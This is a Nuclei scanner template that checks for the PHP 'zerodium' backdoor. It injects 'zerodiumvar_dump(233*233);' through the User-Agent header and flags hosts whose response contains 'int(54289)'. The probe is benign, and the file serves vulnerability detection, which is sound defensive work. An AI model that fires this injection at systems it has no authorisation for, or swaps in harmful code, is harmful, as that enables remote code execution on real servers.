nuclei-templates/vulnerabilities/other/php-zerodium-backdoor-rce.yaml

26 lines
575 B
YAML

id: php-zerodium-backdoor-rce
info:
name: PHP Zerodium Backdoor RCE
author: dhiyaneshDk
description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
reference: https://news-web.php.net/php.internals/113838
severity: critical
tags: php,backdoor
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: zerodiumvar_dump(233*233);
matchers-condition: and
matchers:
- type: word
words:
- "int(54289)"
part: body